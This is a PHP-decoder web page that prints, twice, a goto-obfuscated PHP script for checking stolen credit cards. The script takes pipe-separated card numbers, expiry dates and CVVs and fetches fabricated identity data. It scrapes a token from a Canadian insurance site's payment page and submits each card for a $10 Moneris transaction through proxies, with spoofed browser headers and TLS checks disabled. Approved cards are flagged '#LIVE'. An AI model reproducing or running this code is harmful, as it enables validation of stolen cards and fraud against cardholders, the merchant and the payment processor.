Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

goto HbSqg; UYgpD: $cvv = $separa[3]; goto fBAC9; WyCVu: $separa = explode("|", $card); g..

Decoded Output download

<?   goto HbSqg; UYgpD: $cvv = $separa[3]; goto fBAC9; WyCVu: $separa = explode("|", $card); goto K1BJV; eLMlU: $yy = $separa[2]; goto UYgpD; V0LHk: $ddd = curl_exec($ch); goto D2nht; GnsEk: $pmethod = $cc[0] == "4" ? "visa" : "master-card"; goto T_9C5; AGSjm: $ch = curl_init(); goto Ufxtk; JB5ek: $initial = $brand == "visa" ? "VI" : "MC"; goto CJYSj; fHT5D: curl_setopt_array($ch, array(CURLOPT_URL => "https://orbitinsuranceservices.ca/ino_monerischeckout", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: */*", "Accept-Language: en-US,en;q=0.5", "Content-Type: application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With: XMLHttpRequest", "Origin: https://orbitinsuranceservices.ca", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Referer: https://orbitinsuranceservices.ca/payment", "Sec-Fetch-Dest: empty", "Sec-Fetch-Mode: cors", "Sec-Fetch-Site: same-origin", "Priority: u=1"), CURLOPT_POSTFIELDS => "__RequestVerificationToken=" . $__RequestVerificationToken . "&ClientID=" . invoice() . "&Email=" . $email . "&Amount=%2410.00&culture=en-CA")); goto DvjBP; T_9C5: $pmethod2 = $cc[0] == "4" ? "1" : "2"; goto JB5ek; H7Q1F: curl_close($ch); goto qi8xg; E3Z8N: $brand = $cc[0] == "4" ? "visa" : "mc"; goto lr00Y; EfSKL: $status = json_decode($ggg)->response->result; goto tQ6lR; StyF2: curl_setopt_array($ch, array(CURLOPT_URL => "https://gateway.moneris.com/chktv2/display/request.php", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: application/json, text/javascript, */*; q=0.01", "Accept-Language: en-US,en;q=0.5", "Content-Type: application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With: XMLHttpRequest", "Origin: https://gateway.moneris.com", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Referer: https://gateway.moneris.com/chktv2/display/index.php?tck={$ticket}", "Sec-Fetch-Dest: empty", "Sec-Fetch-Mode: cors", "Sec-Fetch-Site: same-origin"), CURLOPT_POSTFIELDS => "ticket=" . $ticket . "&action=process_transaction&first_name=" . $first . "&last_name=" . $last . "&phone=" . $phone . "&cardholder=" . $first . "+" . $last . "&pan=" . $cc . "&expiry_date=" . $mm . '' . $yy2 . "&=Submit&cvv=" . $cvv . "&b_address_1=" . $street . "&b_address_2=&b_city=" . $city . "&b_country=CA&b_province=ON&b_postal_code=L3R+1H7&currency_code=CAD&wallet_details=%7B%7D&gift_details=%7B%7D&card_data_key=new")); goto WGMMN; ZNty6: $ch = curl_init(); goto TgQkD; sr2YH: $last2 = substr($cc, -2); goto FiNDn; Mn1nK: ini_set("max_execution_time", "0"); goto wP2rY; TwM69: function unlinkCookies() { array_map("unlink", glob(getcwd() . "/cookies/cookies*.txt")); } goto ewJF0; GbK6q: $ch = curl_init(); goto vS8RF; jrPbb: if (strlen($yy) == 4) { $yy2 = substr($yy, 2); } goto vzpx9; HbSqg: ?> 
-<?php  goto MzU18; WuKnA: $eee = curl_exec($ch); goto PJBRc; MzU18: error_reporting(E_ERROR | E_PARSE); goto Mn1nK; Jfw1i: function invoice() { return mt_rand(10000000, 99999999); } goto WyCVu; PJBRc: curl_close($ch); goto zeyRq; J8Ym1: curl_close($ch); goto GbK6q; OBYRG: $last = json_decode($kipay)->last; goto WptiS; FhFEv: $cc4 = substr($cc, 12, 4); goto jrPbb; vzpx9: if (strlen($mm) == 2) { $mm1 = substr($mm, 1); } goto AGSjm; wP2rY: if ($_SERVER["REQUEST_METHOD"] == "POST") { extract($_POST); } elseif ($_SERVER["REQUEST_METHOD"] == "GET") { extract($_GET); } goto TwM69; WGMMN: $ggg = curl_exec($ch); goto mltg3; fBAC9: $last4 = substr($cc, -4); goto sr2YH; vS8RF: curl_setopt_array($ch, array(CURLOPT_URL => "https://orbitinsuranceservices.ca/ino_monerischeckout/getmonerischeckoutticket?success=true&ClientID=" . invoice() . "&Amount=%2410.00&culture=en-CA&Email={$email}", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: */*", "Accept-Language: en-US,en;q=0.5", "Referer: https://orbitinsuranceservices.ca/payment", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Sec-Fetch-Dest: empty", "Sec-Fetch-Mode: cors", "Sec-Fetch-Site: same-origin", "Priority: u=6"))); goto EI75Q; RNnib: $first = json_decode($kipay)->first; goto OBYRG; S5zg5: $ch = curl_init(); goto fHT5D; wJam7: $cc3 = substr($cc, 8, 4); goto FhFEv; hi0Cs: $ch = curl_init(); goto jEt3g; WPYKJ: $zip = json_decode($kipay)->zip; goto y3kuJ; DvjBP: $bbb = curl_exec($ch); goto J8Ym1; xmrV3: $aaa = curl_exec($ch); goto ZdKBV; EI75Q: $ccc = curl_exec($ch); goto H7Q1F; BpsYr: curl_setopt_array($ch, array(CURLOPT_URL => "https://orbitinsuranceservices.ca/payment", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language: en-US,en;q=0.5", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "Sec-Fetch-Dest: document", "Sec-Fetch-Mode: navigate", "Sec-Fetch-Site: none", "Sec-Fetch-User: ?1", "Priority: u=1"))); goto xmrV3; m0e_Q: $kipay = curl_exec($ch); goto Ftzbj; qi8xg: $ticket = json_decode($ccc)->ticket; goto ZNty6; ZdKBV: curl_close($ch); goto DvMXE; o0QEs: $cc2 = substr($cc, 4, 4); goto wJam7; vGVk7: $ch = curl_init(); goto BpsYr; K1BJV: $cc = $separa[0]; goto fSAXq; Ufxtk: curl_setopt_array($ch, array(CURLOPT_URL => "https://my.api.mockaroo.com/united_states.json?key=cc49f160", CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language: en-US,en;q=0.5"))); goto m0e_Q; I2r9c: $type2 = $cc[0] == "4" ? "Visa" : "Mastercard"; goto GnsEk; WptiS: $email = json_decode($kipay)->email; goto PXvXB; mltg3: curl_close($ch); goto EfSKL; y3kuJ: $street = json_decode($kipay)->street; goto pBZ5X; Ftzbj: curl_close($ch); goto RNnib; FiNDn: $bin = substr($cc, 0, 6); goto E3Z8N; tQ6lR: $deff = htmlentities($ggg); goto IZXF6; fSAXq: $mm = $separa[1]; goto eLMlU; Qm5pP: $state2 = json_decode($kipay)->state2; goto vGVk7; IZXF6: if ($status == "a") { echo "<span class="text">#LIVE  " . $card . " - Status: " . $status . " </span> </br>"; } elseif ($status) { echo "<span class="text">" . $card . " - Status: " . $status . " </span> </br>"; } else { echo "<span class="text">" . $deff . "</span> </br"; } goto Qhh0m; DvMXE: $__RequestVerificationToken = choc($aaa, "name="__RequestVerificationToken" type="hidden" value="", """); goto S5zg5; jEt3g: curl_setopt_array($ch, array(CURLOPT_URL => "https://gateway.moneris.com/chktv2/display/request.php", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: application/json, text/javascript, */*; q=0.01", "Accept-Language: en-US,en;q=0.5", "Content-Type: application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With: XMLHttpRequest", "Origin: https://gateway.moneris.com", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Referer: https://gateway.moneris.com/chktv2/display/index.php?tck={$ticket}", "Sec-Fetch-Dest: empty", "Sec-Fetch-Mode: cors", "Sec-Fetch-Site: same-origin", "Priority: u=1"), CURLOPT_POSTFIELDS => "pan={$cc}&ticket={$ticket}&action=get_card_type")); goto WuKnA; CwwnV: $cookies = getcwd() . "/cookies/cookies" . rand(1000000, 99999999) . ".txt"; goto Wsiz2; PXvXB: $phone = json_decode($kipay)->phone; goto WPYKJ; lr00Y: $type = $cc[0] == "4" ? "visa" : "mastercard"; goto I2r9c; Wsiz2: function choc($string, $start, $end) { $str = explode($start, $string); $str = explode($end, $str[1]); return $str[0]; } goto Jfw1i; D2nht: curl_close($ch); goto hi0Cs; CJYSj: $cc1 = substr($cc, 0, 4); goto o0QEs; ewJF0: if (!is_dir(getcwd() . "/cookies")) { mkdir(getcwd() . "/cookies", 493); } goto CwwnV; aiHwS: $state1 = json_decode($kipay)->state1; goto Qm5pP; pBZ5X: $city = json_decode($kipay)->city; goto aiHwS; zeyRq: $ch = curl_init(); goto StyF2; TgQkD: curl_setopt_array($ch, array(CURLOPT_URL => "https://gateway.moneris.com/chktv2/display/index.php?tck={$ticket}", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language: en-US,en;q=0.5", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Referer: https://orbitinsuranceservices.ca/", "Upgrade-Insecure-Requests: 1", "Sec-Fetch-Dest: iframe", "Sec-Fetch-Mode: navigate", "Sec-Fetch-Site: cross-site", "Priority: u=4"))); goto V0LHk; Qhh0m:  ?>

Did this file decode correctly?

Original Code

 goto HbSqg; UYgpD: $cvv = $separa[3]; goto fBAC9; WyCVu: $separa = explode("|", $card); goto K1BJV; eLMlU: $yy = $separa[2]; goto UYgpD; V0LHk: $ddd = curl_exec($ch); goto D2nht; GnsEk: $pmethod = $cc[0] == "4" ? "visa" : "master-card"; goto T_9C5; AGSjm: $ch = curl_init(); goto Ufxtk; JB5ek: $initial = $brand == "visa" ? "VI" : "MC"; goto CJYSj; fHT5D: curl_setopt_array($ch, array(CURLOPT_URL => "https://orbitinsuranceservices.ca/ino_monerischeckout", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: */*", "Accept-Language: en-US,en;q=0.5", "Content-Type: application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With: XMLHttpRequest", "Origin: https://orbitinsuranceservices.ca", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Referer: https://orbitinsuranceservices.ca/payment", "Sec-Fetch-Dest: empty", "Sec-Fetch-Mode: cors", "Sec-Fetch-Site: same-origin", "Priority: u=1"), CURLOPT_POSTFIELDS => "__RequestVerificationToken=" . $__RequestVerificationToken . "&ClientID=" . invoice() . "&Email=" . $email . "&Amount=%2410.00&culture=en-CA")); goto DvjBP; T_9C5: $pmethod2 = $cc[0] == "4" ? "1" : "2"; goto JB5ek; H7Q1F: curl_close($ch); goto qi8xg; E3Z8N: $brand = $cc[0] == "4" ? "visa" : "mc"; goto lr00Y; EfSKL: $status = json_decode($ggg)->response->result; goto tQ6lR; StyF2: curl_setopt_array($ch, array(CURLOPT_URL => "https://gateway.moneris.com/chktv2/display/request.php", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: application/json, text/javascript, */*; q=0.01", "Accept-Language: en-US,en;q=0.5", "Content-Type: application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With: XMLHttpRequest", "Origin: https://gateway.moneris.com", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Referer: https://gateway.moneris.com/chktv2/display/index.php?tck={$ticket}", "Sec-Fetch-Dest: empty", "Sec-Fetch-Mode: cors", "Sec-Fetch-Site: same-origin"), CURLOPT_POSTFIELDS => "ticket=" . $ticket . "&action=process_transaction&first_name=" . $first . "&last_name=" . $last . "&phone=" . $phone . "&cardholder=" . $first . "+" . $last . "&pan=" . $cc . "&expiry_date=" . $mm . '' . $yy2 . "&=Submit&cvv=" . $cvv . "&b_address_1=" . $street . "&b_address_2=&b_city=" . $city . "&b_country=CA&b_province=ON&b_postal_code=L3R+1H7&currency_code=CAD&wallet_details=%7B%7D&gift_details=%7B%7D&card_data_key=new")); goto WGMMN; ZNty6: $ch = curl_init(); goto TgQkD; sr2YH: $last2 = substr($cc, -2); goto FiNDn; Mn1nK: ini_set("max_execution_time", "0"); goto wP2rY; TwM69: function unlinkCookies() { array_map("unlink", glob(getcwd() . "/cookies/cookies*.txt")); } goto ewJF0; GbK6q: $ch = curl_init(); goto vS8RF; jrPbb: if (strlen($yy) == 4) { $yy2 = substr($yy, 2); } goto vzpx9; HbSqg: ?>
-<?php  goto MzU18; WuKnA: $eee = curl_exec($ch); goto PJBRc; MzU18: error_reporting(E_ERROR | E_PARSE); goto Mn1nK; Jfw1i: function invoice() { return mt_rand(10000000, 99999999); } goto WyCVu; PJBRc: curl_close($ch); goto zeyRq; J8Ym1: curl_close($ch); goto GbK6q; OBYRG: $last = json_decode($kipay)->last; goto WptiS; FhFEv: $cc4 = substr($cc, 12, 4); goto jrPbb; vzpx9: if (strlen($mm) == 2) { $mm1 = substr($mm, 1); } goto AGSjm; wP2rY: if ($_SERVER["REQUEST_METHOD"] == "POST") { extract($_POST); } elseif ($_SERVER["REQUEST_METHOD"] == "GET") { extract($_GET); } goto TwM69; WGMMN: $ggg = curl_exec($ch); goto mltg3; fBAC9: $last4 = substr($cc, -4); goto sr2YH; vS8RF: curl_setopt_array($ch, array(CURLOPT_URL => "https://orbitinsuranceservices.ca/ino_monerischeckout/getmonerischeckoutticket?success=true&ClientID=" . invoice() . "&Amount=%2410.00&culture=en-CA&Email={$email}", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: */*", "Accept-Language: en-US,en;q=0.5", "Referer: https://orbitinsuranceservices.ca/payment", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Sec-Fetch-Dest: empty", "Sec-Fetch-Mode: cors", "Sec-Fetch-Site: same-origin", "Priority: u=6"))); goto EI75Q; RNnib: $first = json_decode($kipay)->first; goto OBYRG; S5zg5: $ch = curl_init(); goto fHT5D; wJam7: $cc3 = substr($cc, 8, 4); goto FhFEv; hi0Cs: $ch = curl_init(); goto jEt3g; WPYKJ: $zip = json_decode($kipay)->zip; goto y3kuJ; DvjBP: $bbb = curl_exec($ch); goto J8Ym1; xmrV3: $aaa = curl_exec($ch); goto ZdKBV; EI75Q: $ccc = curl_exec($ch); goto H7Q1F; BpsYr: curl_setopt_array($ch, array(CURLOPT_URL => "https://orbitinsuranceservices.ca/payment", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language: en-US,en;q=0.5", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "Sec-Fetch-Dest: document", "Sec-Fetch-Mode: navigate", "Sec-Fetch-Site: none", "Sec-Fetch-User: ?1", "Priority: u=1"))); goto xmrV3; m0e_Q: $kipay = curl_exec($ch); goto Ftzbj; qi8xg: $ticket = json_decode($ccc)->ticket; goto ZNty6; ZdKBV: curl_close($ch); goto DvMXE; o0QEs: $cc2 = substr($cc, 4, 4); goto wJam7; vGVk7: $ch = curl_init(); goto BpsYr; K1BJV: $cc = $separa[0]; goto fSAXq; Ufxtk: curl_setopt_array($ch, array(CURLOPT_URL => "https://my.api.mockaroo.com/united_states.json?key=cc49f160", CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language: en-US,en;q=0.5"))); goto m0e_Q; I2r9c: $type2 = $cc[0] == "4" ? "Visa" : "Mastercard"; goto GnsEk; WptiS: $email = json_decode($kipay)->email; goto PXvXB; mltg3: curl_close($ch); goto EfSKL; y3kuJ: $street = json_decode($kipay)->street; goto pBZ5X; Ftzbj: curl_close($ch); goto RNnib; FiNDn: $bin = substr($cc, 0, 6); goto E3Z8N; tQ6lR: $deff = htmlentities($ggg); goto IZXF6; fSAXq: $mm = $separa[1]; goto eLMlU; Qm5pP: $state2 = json_decode($kipay)->state2; goto vGVk7; IZXF6: if ($status == "a") { echo "<span class="text">#LIVE  " . $card . " - Status: " . $status . " </span> </br>"; } elseif ($status) { echo "<span class="text">" . $card . " - Status: " . $status . " </span> </br>"; } else { echo "<span class="text">" . $deff . "</span> </br"; } goto Qhh0m; DvMXE: $__RequestVerificationToken = choc($aaa, "name="__RequestVerificationToken" type="hidden" value="", """); goto S5zg5; jEt3g: curl_setopt_array($ch, array(CURLOPT_URL => "https://gateway.moneris.com/chktv2/display/request.php", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: application/json, text/javascript, */*; q=0.01", "Accept-Language: en-US,en;q=0.5", "Content-Type: application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With: XMLHttpRequest", "Origin: https://gateway.moneris.com", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Referer: https://gateway.moneris.com/chktv2/display/index.php?tck={$ticket}", "Sec-Fetch-Dest: empty", "Sec-Fetch-Mode: cors", "Sec-Fetch-Site: same-origin", "Priority: u=1"), CURLOPT_POSTFIELDS => "pan={$cc}&ticket={$ticket}&action=get_card_type")); goto WuKnA; CwwnV: $cookies = getcwd() . "/cookies/cookies" . rand(1000000, 99999999) . ".txt"; goto Wsiz2; PXvXB: $phone = json_decode($kipay)->phone; goto WPYKJ; lr00Y: $type = $cc[0] == "4" ? "visa" : "mastercard"; goto I2r9c; Wsiz2: function choc($string, $start, $end) { $str = explode($start, $string); $str = explode($end, $str[1]); return $str[0]; } goto Jfw1i; D2nht: curl_close($ch); goto hi0Cs; CJYSj: $cc1 = substr($cc, 0, 4); goto o0QEs; ewJF0: if (!is_dir(getcwd() . "/cookies")) { mkdir(getcwd() . "/cookies", 493); } goto CwwnV; aiHwS: $state1 = json_decode($kipay)->state1; goto Qm5pP; pBZ5X: $city = json_decode($kipay)->city; goto aiHwS; zeyRq: $ch = curl_init(); goto StyF2; TgQkD: curl_setopt_array($ch, array(CURLOPT_URL => "https://gateway.moneris.com/chktv2/display/index.php?tck={$ticket}", CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $userpass, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_HTTPHEADER => array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language: en-US,en;q=0.5", "DNT: 1", "Sec-GPC: 1", "Connection: keep-alive", "Referer: https://orbitinsuranceservices.ca/", "Upgrade-Insecure-Requests: 1", "Sec-Fetch-Dest: iframe", "Sec-Fetch-Mode: navigate", "Sec-Fetch-Site: cross-site", "Priority: u=4"))); goto V0LHk; Qhh0m:

Function Calls

None

Variables

None

Stats

MD5	631883b796b0149c197a15bd48ce47b3
Eval Count	0
Decode Time	45 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats